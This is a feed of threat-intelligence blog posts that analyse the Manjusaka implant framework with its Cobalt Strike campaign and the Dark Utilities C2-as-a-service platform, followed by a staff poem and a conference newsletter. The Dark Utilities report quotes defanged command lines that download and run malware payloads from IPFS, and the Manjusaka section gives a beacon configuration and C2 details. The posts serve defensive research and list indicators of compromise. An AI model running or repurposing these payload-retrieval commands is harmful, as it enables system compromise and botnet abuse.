http://<C2_IP_ADDRESS>:<Port>/agent?c=<C2_IP_ADDRESS>:<PORT>&t=<EXTENDED_URL_for_C2>&k=<ENCRYPTION_KEY>&w=true

The C2 server will then generate a configured Rust-based implant for the operator. The C2 uses packr to store the unconfigured Rust-based implant within the C2 binary consisting of a single packaged C2 binary that generates implants without any external dependencies.

The C2 will open a "box" — i.e., a virtual folder within the GoLang-based C2 binary — that consists of a dummy Rust implant at location "plugins/npc.exe". This executable is a pre-built version of the Rust implant that is then hot-patched by the C2 server based on the C2 information entered by the operator via the Web UI.

The skeleton Rust implant contains placeholders for the C2 IP/domain and the extended URLs in the form of repeated special characters "$" and "*" respectively, 0x21 repetitions.

E.g. The place holder for the C2 IP/Domain in the dummy implant is (hex):

24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24

which is then replaced by the C2 with an IP address such as:

33 39 2E 31 30 34 2E 39 30 2E 34 35 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24

The hot-patched binary is then served to the operator to download in response to the HTTP GET request from earlier.



The campaign: Infection chain


We've also discovered a related campaign that consisted of a distribution of a maldoc to targets leading to the deployment of Cobalt Strike beacons on the infected systems.

The infection chain involves the use of a maldoc masquerading as a report and advisory on the COVID-19 pandemic in Golmud City, one of the largest cities in the Haixi Mongol and Tibetan Autonomous Prefecture, Qinghai Province — specifically citing a case of COVID-19 and the subsequent contact tracing of individuals.


Maldoc lure masquerading as a report on a COVID-19 case in Golmud City.


Maldoc analysis


The maldoc contains a VBA macro that executes rundll32.exe and injects Metasploit shellcode (Stage 1) into the process to download and execute the next stage (Stage 2) in memory.

The Stage 1 shellcode reached out to 39[.]104[.]90[.]45/2WYz.



Stage 1 shellcode downloading the next stage (Stage 2) from a remote location.


Stage 2 analysis


The next stage payload downloaded from the remote location is yet another shellcode that consists of:

  • XOR-encoded executable: Cobalt Strike.
  • Shellcode for decoding and reflectively loading the Cobalt Strike beacon into memory.


Code for decoding Stage 3 (Cobalt Strike beacon) in memory and executing it from the beginning of the MZ.


Stage 3: Cobalt Strike beacon


The Cobalt Strike beacon decoded by the previous stage is then executed from the beginning of the MZ file. The beacon can reflectively load itself into the memory of the current process.


Beacon calculating and calling into the address of the DLL export enables it to reflectively load into the current process.

The beacon's config is XOR encoded with the 0x4D single byte key. The configuration is:

BeaconType -                      HTTPS
Port -                            443
SleepTime -                       60000
MaxGetSize -                      1048576
Jitter -                          0
MaxDNS -                          Not Found
PublicKey -
b'0\x81\x9f0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x81\x8d\x000\x81\x89\x02\x81\x81\x00\x95\xe2\xd1\xdd1N\x99\x13W%\xdd\x86\x1ep\xf7c\x12\x8f\xf3\xc3\x81\x93\xc7\n84\xa2^T\x13\x93\x8d6\xec\xb5V\x931\x01\xd2\x87o\xa1\xa8\x10\xea\x9f\x8c\xc2uY\x92\xa0z\x82d1m\x02\xa44\xdbc\xdf\xd7\x1d#2U\x1b\x158\xc8\x1dqX\x91\xe5\[email protected]\x9a\xe2\xea\x0b\xd2\xcd\x9f\xae\xb1h\x08\x15|\xa3\x0cc\xde<\x17o|\x0c\x96\x878\xd2\xb4|\x86}\xa7H\x99\xd7\x8fc\xc8#\xe7W7\xec\x8fmx\xeb\xe3{\x02\x03\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

C2Server -                    39[.]104[.]90[.]45,/IE9CompatViewList.xml
UserAgent -                       Not Found
HttpPostUri -                     /submit.php
HttpGet_Metadata -                Not Found
HttpPost_Metadata -               Not Found
SpawnTo - b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

PipeName -                        Not Found
DNS_Idle -                        Not Found
DNS_Sleep -                       Not Found
SSH_Host -                        Not Found
SSH_Port -                        Not Found
SSH_Username -                    Not Found
SSH_Password_Plaintext -          Not Found
SSH_Password_Pubkey -             Not Found
HttpGet_Verb -                    GET
HttpPost_Verb -                   POST
HttpPostChunk -                   0
Spawnto_x86 -                     %windir%\syswow64\rundll32.exe
Spawnto_x64 -                     %windir%\sysnative\rundll32.exe
CryptoScheme -                    0
Proxy_Config -                    Not Found
Proxy_User -                      Not Found
Proxy_Password -                  Not Found
Proxy_Behavior -                  Use IE settings
Watermark -                       999999
bStageCleanup -                   False
bCFGCaution -                     False
KillDate -                        0
bProcInject_StartRWX -            True
bProcInject_UseRWX -              True
bProcInject_MinAllocSize -        0
ProcInject_PrependAppend_x86 -    Empty
ProcInject_PrependAppend_x64 -    Empty
ProcInject_Execute -              CreateThread
                                  SetThreadContext
                                  CreateRemoteThread
                                  RtlCreateUserThread
ProcInject_AllocationMethod -     VirtualAllocEx
bUsesCookies -                    True



Attribution


Before even thinking about the attribution, it's important to distinguish between the developer of the malware and the campaign operators. The C2 binary is fully functional (although limited in features), self contained and publicly available, which means that anyone could have downloaded it and used it in the campaign we discovered.

As such, we have decided to list the data points that could be interpreted as a possible indicator and encourage the community to perform the analysis and add other data points that might contribute to the attribution, either for the campaign or for the developers behind the framework.

For this campaign, there isn't much to lead to formal attribution with any confidence, besides the fact that the maldoc refers to a COVID-19 outbreak in Golmud City, offering a detailed timeline of the outbreak.

For the developer of Manjusaka, we have several indicators:

  • The Rust-based implant does not use the standard crates.io library repository for the dependency resolving. Instead, it was manually configured by the developers to use the mirror located at ustc[.]edu[.]cn, which stands for the University Science and Technology of China.
  • The C2 menus and options are all written in Simplified Chinese.
  • Our OSINT suggests that the author of this framework is located in the GuangDong region of China.


Conclusion


The availability of the Manjusaka offensive framework is an indication of the popularity of widely available offensive technologies with both crimeware and APT operators. This new attack framework contains all the features that one would expect from an implant, however, it is written in the most modern and portable programming languages. The developer of the framework can easily integrate new target platforms like MacOSX or more exotic flavors of Linux as the ones running on embedded devices. The fact that the developer made a fully functional version of the C2 available increases the chances of wider adoption of this framework by malicious actors.

Organizations must be diligent against such easily available tools and frameworks that can be misused by a variety of threat actors. In-depth defense strategies based on a risk analysis approach can deliver the best results in the prevention. However, this should always be complemented by a good incident response plan which has been not only tested with tabletop exercises and reviewed and improved every time it's put to the test on real engagements.


Coverage


Ways our customers can detect and block this threat are listed below.



Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.




IOCs


IOCs for this research can also be found at our Github repository here.

Hashes


Maldoc and CS beacon samples

58a212f4c53185993a8667afa0091b1acf6ed5ca4ff8efa8ce7dae784c276927
8e7c4df8264d33e5dc9a9d739ae11a0ee6135f5a4a9e79c354121b69ea901ba6
54830a7c10e9f1f439b7650607659cdbc89d02088e1ab7dd3e2afb93f86d4915


Rust samples

8e9ecd282655f0afbdb6bd562832ae6db108166022eb43ede31c9d7aacbcc0d8
a8b8d237e71d4abe959aff4517863d9f570bba1646ec4e79209ec29dda64552f
3f3eb6fd0e844bc5dad38338b19b10851083d078feb2053ea3fe5e6651331bf2
0b03c0f3c137dacf8b093638b474f7e662f58fef37d82b835887aca2839f529b


C2 binaries

fb5835f42d5611804aaa044150a20b13dcf595d91314ebef8cf6810407d85c64
955e9bbcdf1cb230c5f079a08995f510a3b96224545e04c1b1f9889d57dd33c1


URLs

https[://]39[.]104[.]90[.]45/2WYz
http[://]39[.]104[.]90[.]45/2WYz
http[://]39[.]104[.]90[.]45/IE9CompatViewList.xml
http[://]39[.]104[.]90[.]45/submit.php


User-Agents

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Mozilla/5.0 (Windows NT 8.0; WOW64; rv:58.0) Gecko/20120102 Firefox/58
Mozilla/5.0 (Windows NT 8.0; WOW64; rv:40.0) Gecko


IPs

39[.]104[.]90[.]45








0xCC'd

4 August 2022 at 11:01

We spend a lot of time preparing for Blackhat, and as part of putting together content for the show, one of our best, Lurene Grenier, submitted an unexpected piece of content: a poem. Now this poem isn't our regular security research or a shiny piece of corporate correspondence (which we would never do anyways) — but it is raw, and it is painful and it is brilliant. And it raises a number of issues that Cisco takes very seriously, including work-life balance and mental health. In particular, by my interpretation, it speaks about early-in-career work-life balance. I know at that point in my career I felt grateful just to be in the industry while at the same time I felt powerless to advocate for myself in the face of the overwhelming demands of the workplace. This poem hit me hard, and in truth I wouldn't want it published anywhere other than on the Talos blog. So we are presenting Lurene's words here, in hopes that they trigger important conversations and also to remind everyone to just take care of each other. If you'd like to chat with Lurene or myself or another Cisco manager about these issues, we'll be at the Cisco booth (#1932) at Blackhat.  Please come by, say hi, and share your thoughts.

-- Matthew Olney

-- Director, Threat Intelligence & Interdiction

0xCC'd

manuals were thick plasticized paper on spiral bindings
made to see use expected to tolerate the conditions just as
you were conditioned to dusty basement rooms low hanging
yellowed flourescent lights heavy doors beige and gray and
square doing nothing to help that all nighter we'll just
add a headache on top of that have fun nothing hurts when
youre 20 or maybe you just didnt know you could not hurt

drop ceilings and too much air conditioning my friend got
pnuemonia on a 100 degree day from entering and leaving
server rooms he laughs about it by the way if the alarm
goes off run theyll kill you to keep the website up

text debuggers and assembly manuals and intel 3A our computing
center at RPI was a gothic church the pews rows and rows of
gray purple lunch boxes candied irix gumdrops stoic yellowed
SCO pizza boxes square blue chunky power buttons I was a
believer worshiping the saints studying hennessy groaning
through chomsky it was more useful than I imagined it might be

bringing life to hot dead business parks all bricks and
bland cubicle walls with all the myriad ways to avoid
the frustrations with setting up test systems and chasing
your own tail foos ball minor explosives research chemicals
and every other manic desperate strangeness devised by
our ingenium

who devoted their nights and weekends to the stability
of other people's e-shops willingly giving away life to
retain the privilege of gaining sustenance from a work
they might have loved rather than one they certainly
despised

who blacked out more than once from exhaustion or booze
or electric scooters in parking lots concussed but no
worse for the wear or so we believed nothing hurts when
youre 20

who escaped from las vegas in twos and threes in the
early hours because just maybe theyd had too much
too fast in unrenovated garish hotel rooms in long
gone casino hotels

who pointed all their firewalls in the wrong direction

who were equally devoured by ads and consolidation and
the little computer that isnt yours and you cant control
but controls you

who gave up on art and culture some time around when
they decided it was worth it to consider buying
a new tesla a smart trade says dad

what sphinx of aluminum and silicon and guerilla glass
bashed open their skulls and ate up their brains and imagination

Hold on a little longer hipsters - I miss your angel heads
-- Lurene Grenier

Attackers leveraging Dark Utilities "C2aaS" platform in malware campaigns

4 August 2022 at 12:00
By Edmund Brumaghin, Azim Khodjibaev and Matt Thaxton, with contributions from Arnaud Zobec.

Executive Summary


  • Dark Utilities, released in early 2022, is a platform that provides full-featured C2 capabilities to adversaries.
  • It is marketed as a means to enable remote access, command execution, distributed denial-of-service (DDoS) attacks and cryptocurrency mining operations on infected systems.
  • Payloads provided by the platform support Windows, Linux and Python-based implementations and are hosted within the Interplanetary File System (IPFS), making them resilient to content moderation or law enforcement intervention.
  • Since its initial release, we've observed malware samples in the wild leveraging it to facilitate remote access and cryptocurrency mining.


What is "Dark Utilities?"


In early 2022, a new C2 platform called "Dark Utilities" was established, offering a variety of services such as remote system access, DDoS capabilities and cryptocurrency mining. The operators of the service also established Discord and Telegram communities where they provide technical support and assistance for customers on the platform.
Dark Utilities provides payloads consisting of code that is executed on victim systems, allowing them to be registered with the service and establish a command and control (C2) communications channel. The platform currently supports Windows, Linux and Python-based payloads, allowing adversaries to target multiple architectures without requiring significant development resources. During our analysis, we observed efforts underway to expand OS and system architecture support as the platform continues to see ongoing development activities occurring.

The platform, hosted on the clear internet and Tor network, offers premium access to the platform, associated payloads and API endpoints for 9.99 euros. At the time of writing, the platform had enrolled roughly 3,000 users, which is approximately 30,000 euros in income. Given the relatively low cost compared to the amount of functionality the platform offers, it is likely attractive to adversaries attempting to compromise systems without requiring them to create their own C2 implementation within their malware payloads.
Almost immediately, we observed malware samples using this service in the wild as a way to establish C2 communications channels and establish remote access capabilities on infected systems. We've observed malware targeted Windows and Linux systems leveraging Dark Utilities.


Dark Utilities platform functionality


The Dark Utilities platform leverages Discord for user authentication. Once authenticated, users are presented with a dashboard displaying various statistics about the platform, server health status and other metrics.
To register new bots with the service, a payload must be generated and deployed on victim machines. At the time of writing, the platform supports several operating systems, as shown in the payload selection drop-down below.
Selecting an operating system causes the platform to generate a command string that threat actors are typically embedding into PowerShell or Bash scripts to facilitate the retrieval and execution of the payload on victim machines. An example of this for a payload targeting the Windows operating system is shown below.
cd %userprofile%\Documents && mkdir Steam &&  cd .\Steam &&  curl hxxps[:]//ipfs[.]infura[.]io/ipfs/QmRLaPCGa2HZTxMPQxU2VnB9qda3mUv21TXrjbMNqkxN6Z >> launcher.exe &&  .\launcher.exe [ACCOUNT_STRING_PARAMETER]
For Linux-based payloads, an example command string is:
cd /tmp/;curl hxxps[:]//ipfs[.]infura[.]io/ipfs/QmVwqSG7TGceZJ6MWnKgYkiyqnW4qTTRq61ADDfMJaPEoG > ./tcp-client;chmod +x tcp-client; ./tcp-client [ACCOUNT_STRING_PARAMETER]
Recently, the platform added support for other architectures such as ARM64 and ARMV71, which they describe as being useful for targeting various embedded devices such as routers, phones and internet-of-things (IoT) devices, as shown below.
The use of IPFS for hosting the payload binaries provides resilience against content moderation or takedowns, as IPFS is a distributed, peer-to-peer network explicitly designed to prevent centralized authorities from taking action on content hosted there. IPFS supports the use of IPFS gateways, which operate similar to Tor2Web gateways in that they allow users on the internet to access contents hosted within IPFS without requiring a client application to be installed. We have observed adversaries increasingly making use of this infrastructure for payload hosting and retrieval as it effectively provides "bulletproof hosting." A public list of IPFS gateways that are maintained is below.
For administering bots that have been registered with the Dark Utilities platform, a "Manager" administrative panel is provided. The panel lists the systems under the account's control and provides several built-in modules for using them to conduct denial-of-service attacks, perform cryptocurrency mining, and execute commands across systems under their control.
The platform provides built-in interfaces to conduct two different types of DDoS attacks, both of which support multiple methods. Layer 4 supports TCP, UDP and ICMP, as well as a variety specifically designed for various gaming platforms such as Teamspeak3, Fivem, GMOD and Valve, along with specific video games like "Counter Strike: Global Offensive" and "Among Us." Layer 7 supports the GET, POST, HEAD, PATCH, PUT, DELETE, OPTIONS and CONNECT methods. The interface contains forms for configuring Layer 4 and Layer 7 DDoS attacks respectively, as shown below.
The cryptocurrency mining functionality leverages pool[.]hashvault[.]pro for Monero mining and simply requires that the adversary's Monero wallet address be provided.
The platform also provides distributed command execution as well as a Discord grabber that can be run against large numbers of systems simultaneously.
Once an infected system has established an active C2 channel, the adversary obtains full access to the system in the context of the compromised user account. An interactive PowerShell prompt is provided directly within the admin panel.
A built-in Python interpreter allows adversaries to define Python scripts to be executed on systems under their control from within the admin panel itself.
The platform also exposes a REST API that can automate the administration of compromised systems.
Example code is provided for instructing compromised systems to conduct DDoS attacks against targets.
The marketing and rules associated with the use of the platform appear to attempt to minimize liability for the platform operators by staying within legal gray areas with regard to the use of the platform for illegal or illicit purposes.
The documentation provided by the platform, however, also provides step-by-step instructions for conducting reconnaissance, identifying vulnerabilities and exploiting them to "infect servers" for use in a botnet.
Given the low cost associated with the platform and the amount of functionality it provides, it is likely that this will continue to be increasingly popular with threat actors seeking to build botnets without requiring significant amounts of time and effort to develop their own malware.
 

Who is behind Dark Utilities?


Dark Utilities appears to have been created and is currently managed by a persona that goes under the moniker Inplex-sys. Looking closer into the history of that persona, Talos found several instances where they claimed to be a French speaker, although we observed inplex-sys communicating in English, too. The inplex-sys persona does not have a long history in the cybercriminal underground space. Aside from a brief interaction on the Hack Forums platform, inplex-sys has limited their activity to messaging/bot platforms such as Telegram and Discord. Shortly after the platform was launched, we observed inplex-sys advertising it within the Lapsus$ Group — a high-profile actor that recently had several members arrested — Telegram channel.

Talos also found a record for inplex-sys on a doxxing service called Doxbin, which indicated that their location was in Germany. We assess that this Doxbin entry is either incorrect or was intentionally released as a decoy and that they are indeed located in France. Based on limited interaction and other behavioral revelations, it does appear inplex-sys is the main persona behind Dark Utilities, however, there is no indication that they manage and developed it solely by themselves.

We observed the same moniker being used on the video game storefront Steam and advertising the Dark Utilities service and others, with links to their respective websites.
Smart Bot is a bot management platform designed for use in launching spam attacks, or "raids" against the Discord and Twitch communication platforms. These attacks are often conducted to disrupt legitimate communications by flooding the platforms with large quantities of spam messages, which could cost streamers revenue. Demo videos uploaded to YouTube show the tool in action against streamers on Twitch.
The Omega Project purports to be a web panel that can be used to administer servers. They offer a free and paid version of the service. The advertisement displayed on the Omega Project website claims that if the Premium service is purchased, customers' servers will be "secure from all backdoors."
The Smart Bot project lists additional individuals as creators of the project. These individuals appear to have a collaborative relationship with inplex-sys, with one of the Smart Bot creators recently publishing a GitHub repository containing a NodeJS API tool to interact with the Dark Utilities platform.


Dark Utilities payload analysis


The Dark Utilities payloads consist of a Python script that has been compiled into either a Windows PE32+ executable or a Linux ELF executable. We decompiled the binaries to obtain the original Python source code for the payloads.

The Linux payload available during our analysis did not actually require the runtime parameter previously described. If no parameter is specified when the executable is launched, it associates the bot with a default owner, presumably associated with the platform developer.
The Python script contains code for Windows and Linux-based systems and first identifies the architecture of the system it is running on, CPU information and other system details. It then determines if the payload can be updated by communicating with the Dark Utilities API to obtain the latest version information available to compare with the version currently running on the system.
If an updated payload is available, the malware will retrieve it via an IPFS gateway, similar to what was previously described.
Next, the payload attempts to achieve persistence on the system allowing it to execute following system reboots. If the infected system is Windows, the malware will create a Registry run key, as shown below.
If the system is a Linux-compatible system, the malware will attempt to locate and remove any existing Kinsing malware and clear the existing Crontab configuration.
It will then create either a Crontab entry or a Systemd service to ensure that the payload is launched following system reboots.
We observed that in the version analyzed the alphanumeric string associating the system with a specific Dark Utilities account is not defined when persistence mechanisms are established, which results in the malware using the default account string described earlier following system reboots. This issue was observed on both Windows and Linux systems.

The script also contains the code responsible for activating various payload functionality such as cryptocurrency mining, DDoS attacks, etc. If the Monero mining option is deployed, the malware will retrieve XMRig via an IPFS gateway and execute it on the system. The malware uses the Hashvault mining pool and sets a maximum CPU usage value based on the OS of the compromised system.
If Task Manager is launched on the infected machine, the malware attempts to evade detection by terminating the mining process.
The script also defines a class called Attack with subclasses for Layer4 and Layer7 DDoS attack payloads that can be configured and activated via the admin panel previously described. Below are some examples of the payloads defined in the script that target various gaming servers such as "CS:GO," "AmongUs" and TeamSpeak.
The malware uses the following code to handle executing arbitrary system commands using the shell provided in the admin panel. It also supports navigating the filesystem of infected machines via the interface provided by the platform. Python code specified by the adversary can also be executed by the malware payloads.

Malware currently leveraging Dark Utilities


Since the platform was established in early 2022, we have observed a variety of malware samples that leverage Dark Utilities for C2 communications. This includes malware targeting the Windows and Linux operating systems.

In one example, the Stage 1 payload is an executable responsible for dropping a PowerShell script stored within a subfolder of the %TEMP% directory that is also created during Stage 1 execution.
The PowerShell is then executed as follows:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" –NoProfile                                                                                  -ExecutionPolicy Bypass -File C:\Users\[USERNAME]\AppData\Local\Temp\78E6.tmp\7916.tmp\7956.ps1
The PowerShell is responsible for retrieving the Dark Utilities payload via IPFS and executing it on the system.
An example of the PowerShell syntax used is shown below.
cd C:\Users\$env:UserName\Documents\;mkdir Github;cd C:\Users\$env:UserName\Documents\GitHub\;$uri = ('hxxps[:]//ipfs[.]infura[.]io/ipfs/QmbGk4XnFSY8cn4uHjNq6891uLL1zoPbmTigj7YFyPqA2x');curl $uri -o tcp-client.exe; .\tcp-client.exe M0ImZlMzJldIRzFHcSRIMilAKkkwZi8
The Stage 2 payload (the Dark Utilities Windows payload) is stored within a subdirectory of the Documents folder the PowerShell creates. The payload is then executed and passed the threat actor's alphanumeric string. This results in the system registering under the attacker's Dark Utilities account, granting them full control of the compromised system. In this case, the Dark Utilities platform was accessed via a Tor2Web gateway that enables the infected system to communicate with Dark Utilities without requiring the installation of a Tor client.

We have observed similar implementations targeting other operating systems like Linux, where adversaries are leveraging shell scripts to perform the payload retrieval and execution, similar to the example shown below:
In many cases, the alphanumeric string passed as a parameter differs across samples, which may indicate that multiple distinct threat actors are taking this approach to obtain the C2 on compromised systems. The C2 platform itself has moved across various TLDs over time — we have observed samples attempting to retrieve payloads from the site at various points when it was hosted on the ME, XYZ and PW TLDs.


Conclusion


Although the Dark Utilities platform was recently established, thousands of users have already been enrolled and joined the platform. Given the amount of functionality that the platform provides and the relatively low cost of use, we expect this platform will continue to rapidly expand its user base. This will likely result in an increase in the volume of malware samples in the wild attempting to establish C2 using the platform. Organizations should be aware of these C2aaS platforms and ensure that they have security controls in place to help protect their environments. These platforms provide a variety of sophisticated capabilities to adversaries who may otherwise be unable to develop them on their own. They effectively lower the barrier to entry for cybercriminals entering the threat landscape and enable them to quickly begin launching attacks targeting a variety of operating systems. They also offer multiple methods that can be used to further monetize access gained to systems in corporate environments and could lead to further deployment of malware in the environment once initial access has been obtained.


Coverage


Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 60319 - 60325.

Orbital Queries


Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, use the following links:

Windows
Linux


Indicators of Compromise


The following indicators of compromise have been observed associated with malware campaigns leveraging the Dark Utilities platform.

These IOCs can also be found in our Github repository here.

Hashes (SHA256)

09fd574a005f800e6eb37d7e2a3ca640d3ac3ac7dbbde42cbe85aa9e877c1f7f
0a351f3c9fb0add1397a8e984801061ded0802a3c45d9a5fc7098e806011a464
0d76fa68b7d788b37c9e0368222819a9ea3f53c70de61e5899cfbeff4b77b928
1e6e0918d2c93d452d9b3fbcac2cb3202ae3d97394eae6239c2d112791ec8260
240d2029d6f1ca1ee8b5c2d5f0aa862724502f71c48d5544ee053def4c0d83ec
24a5f9a37ed983e9377e0a5c7c5e20db279e3f1bd62acbd7a038fd75b1686617
2e377087d0d2cb90b631ab0543f60d3d5d56db8af858cf625e7a9a26c8726585
2edc356fe59c53ce6232707ae32e15e223c85bbaef5ed6a4767d5c216c3fd4e7
36a1b2c71afe03cc7a0f8eb96b987283bf174eafaade62c20ec8fd6c1b0c1d93
38ee6cc72b373228f7ffddbbf0f78734f85600d84095b057651028472777bde8
41a7d1fa7c70a82656d2fa971befd8fa47a16815a30ff3f671794b0377d886b3
464864cf0c19885d867fdeebec68d72adb72d91910d39f5fc0d0a9c4e3b7ea53
4c252e74d77d50263430c388c08dc522aaeb15ef440c453b2876330a392b85de
4d471cf939cc9d483587b74c0ffebed1b8a3f198d626e4a08d93d689f98122c8
50d0f98b17ca7d37dc8cd70cca2bad4c920b2bb1c059292fe6d203e94716f9bf
52ad5431eeac730b3ff3cfd555d7d6f3fd4b127c9f2d7aa02fc64e48c2eb0ff5
52ba9b0afe0d13957f7f49383b2c1d106e17b4a42c3819973d9862ded7559310
5537a103aebc9237ba6dbc208c4a72c9944fb5de5b676ec684bd4f08b2c49fe7
645190d1702b309b3db5fbbad7ac747afb57fd8119daf39f17f5b5b5868fb136
646b798f9a3251e44703b6e72858dbb854b9d4fb8553fe1e387903b06f4bfe50
65a1b3fb9430c7342d13f79b460b2cc7d9f9ddced2aeecd37f2862a67083e68c
6aa4dceb8c7b468fed2fa1c0b275a0bc4b1500325a3ad42576e7b3b98218614f
6b5b632f9db3a10cf893c496acbf8aecf460c75353af175ab3d90b9af84d4ca3
6c29ff8b0fae690356f85138b843ea2e2202e115e4b1213d96372b9eeef4f42c
6ca488cfbee32e4ea6af8a43b1e0b1a09c8653db7780aa5ff3661e1da31d751a
70706788666c7190803d6760e857e40d076ae69dc6cc172f517a46d8107127e6
72de1dafc8517aa82578b53518959642dc1aede81fc2da9fe01b5070100560d6
74984b6e514a4b77f20ed65a8b490313cbf80319eb3310ed8bca76f83e449564
755e02e1cc3357ec78a218347e4b40aa81783f01658cdf9fc0558e21d2d982ad
7e183f6c9e69535324f5e05bea3fde54a3151c9433717a9111bde6423eaee192
83fd0ced1eaf5f671c3837592684fb04a386649d2eaa12aa525fb73ac3b94a1a
8c59a3125891d8864f385724cd2412e099b88d1a9023a63fd61944ad0f4631d1
92aa81228137d571be956045cf673603e994c5e6d1a35559881e34b99e1e01fa
9d82b17a781835d1f2101e08a628fd834d05fabd53750fee8a0e5565dbdc7842
9e7fd31dfd530a8df90b80c4ae8ca89484e204a8c036125324cd39aa5cd8b562
a2e17c802369254de783115c1c47ddb2ae0e117d3f4be99a8d528f50f7a55e5d
a8fda5e327d5f66a96657cb54d229f029e8e468aac30707331c77dbc53a0e82b
ad50c79f66f6a7b7d8db43105fc931b7f74e1c9efb97e0867cafb373834e88ce
b0f1d43105a2d2b9efb2f36141eaf3f57dc6d7b1593bb31c5a8710614a08c8cc
b291dd56fc5b56d534c763f2d16d2ad340d6fbb735425d635af3fa0063063698
c1cba31a9eb73ea745f5cda1bdf84dc91734821e0899af058ecad5b1e458936c
c9deeda7cd7adb4ff584d13ea64cdb50c9e8b5c616f1dff476f372e86c9b9be6
cacab4c0e3af52bb7f620efc8f676b74caf1dc51983596e6a4a2ac50c5f39528
cd663bbe19ef09b76572cb6960d69e78639aad55b38758597d16deb3a541519f
cf4491029155a703195104cab5fdf314dc1b14b520b2305e66b67e78e240b43c
df6685c4d90ee92854eb7ab91b26eda43933a1a3a8ac3eefc957b1359faa8bea
e32d67b7d62bcaf06618794c0f93e31a03d3b2735d0af191a09092aa4512a37a
e4caf4131dc51c6f44bc75a26061623da269bf20a255c62f5b4a4ab934c7da53
e4eacbcd8ee561f073de7819d84e885c8a1d58614c052c135240783b078e164a
ed9d7558433a9d4fe0b6f632b8f3376aec26fb2a23d6cf2fe1d39c17a544ef39
f6f376c7b1f78fbf2354d2a908ef4ea17bf5e05d0c98af13052d1bc678ae2ebd
b11e566bd9f76563be3e53b1d5b49a2abc84bc89d361b58cb9f7ba85600ddea4

Domains

dark-utilities[.]xyz
dark-utilities[.]pw
dark-utilities[.]me
ijfcm7bu6ocerxsfq56ka3dtdanunyp4ytwk745b54agtravj2wr2qqd[.]onion[.]pet
bafybeidravcab5p3acvthxtwosm4rfpl4yypwwm52s7sazgxaezfzn5xn4[.]ipfs[.]infura-ipfs[.]io

Threat Source newsletter (Aug. 4, 2022) — BlackHat 2022 preview

4 August 2022 at 18:00

By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

After what seems like forever and honestly has been a really long time, we’re heading back to BlackHat in-person this year. We’re excited to see a lot of old friends again to commiserate, hang out, trade stories and generally talk about security.  

Throughout the two days of the main conference, we’ll have a full suite of flash talks at the Cisco Secure booth and several sponsored talks. Since this is the last edition of the newsletter before BlackHat starts, it’s probably worthwhile running through all the cool stuff we’ll have going on at Hacker Summer Camp. 

Our booth should be easy enough to find — it’s right by the main entrance to Bayside B. If you get to the Trellix Lounge, you’ve gone too far north. Our researchers will be there to answer any questions you have and present on a wide variety of security topics, from research into Adobe vulnerabilities to the privacy effects of the overturn of Roe vs. Wade. Attendees who watch a lightning talk can grab a never-before-seen Snort 3-themed Snorty and our malware mascot stickers, which were a big hit at Cisco Live this year.  

We’ll also be over at the Career Center if you want to come work with us. Or even if you don’t, word on the street is there’ll be silver and gold Snortys there. And on Thursday the 11th between 10 a.m. and noon local time a Talos hiring manager will be on site reviewing resumes and taking questions. 

